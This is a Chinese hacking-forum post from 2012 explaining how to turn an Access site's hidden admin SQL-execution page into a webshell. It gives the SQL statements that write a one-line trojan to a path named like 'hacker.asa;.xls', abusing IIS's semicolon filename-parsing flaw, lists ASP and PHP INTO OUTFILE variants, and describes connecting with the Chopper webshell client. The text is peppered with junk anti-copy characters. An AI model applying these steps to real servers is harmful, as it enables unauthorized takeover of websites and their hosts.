找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1997|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
' O  c6 w) O, ~5 {# N/ Owebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
: V# \8 Z: t  O; d( F2 m' Q文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,( r4 D& p! X" t% K
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:4 B- }+ s7 Y$ R; Y, Z# e4 o
1.create table cmd (a varchar(50))
, Q7 H# l# f, P. [) n2.insert into cmd (a) values (‘‘), H& J# B& q2 t6 G& [
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
: b& y6 u4 b- A+ Y% Q(把表cmd的内容导出为物理路径的一个EXCEL文件); {; \% a/ ]8 \! p; @" F4 H8 z/ L
4.drop table cmd+ z% n$ k4 S' R8 ^6 M  }8 V
利用IIS的BUG成功拿到了WEBSHELL。1 {$ U/ h% Z4 m

- P6 H+ B9 v6 d9 e& M7 N, F直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
7 Y6 M: ^0 H9 @0 r9 H( x+ _4 b. i8 [! r+ k) B0 \& G8 s0 h
  SQL语句意思解释:
% y0 Y# t% K$ @- m  第一句
8 G5 ^- }: a% s2 j  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
- L$ \8 j: N. I% P5 ^9 Z( y+ o. S3 q: U6 J
  第二句! Q0 W  ~# z# A8 ?0 E. `
  在表cmd的a字段插入一句话木马8 U! I6 T9 O3 }. k3 d3 L
  第三句
& G' `7 ]7 k3 ~$ W4 k7 X, y  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件3 n7 z; z/ }7 n( l3 n

) {9 h( R- _9 @* D% \5 c' j! E6 t  第四句
: o$ u4 w2 |2 t; h; H  删除建立的cmd表+ \  F8 U" C% N) m: Y$ W* W
7 O" k8 f0 h/ i2 R. y( c
  以下内容为测试:# j/ |5 B4 R# g" ~4 U# Z
  Access利用后台SQL执行命令功能导出WebShell:
6 e! P$ G- V, o+ j! q8 Q  这个更简单:
. m1 p( z. L# f  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
% J& F% I! _3 a$ U) L& I  或者
- M- p+ S! O9 `, A2 c$ Z  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]: `' H/ a, s( J  E. M# h' X! d
8 `; O& t. Z0 [$ x- \0 N1 D/ G2 b6 Z
  后台有执行SQL语句功能(vote为已知表段)
9 O9 P9 r* V6 k% m$ _# Z  希望对大家有所帮助拿shell的又一个思路- E4 p( F; w( e' v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表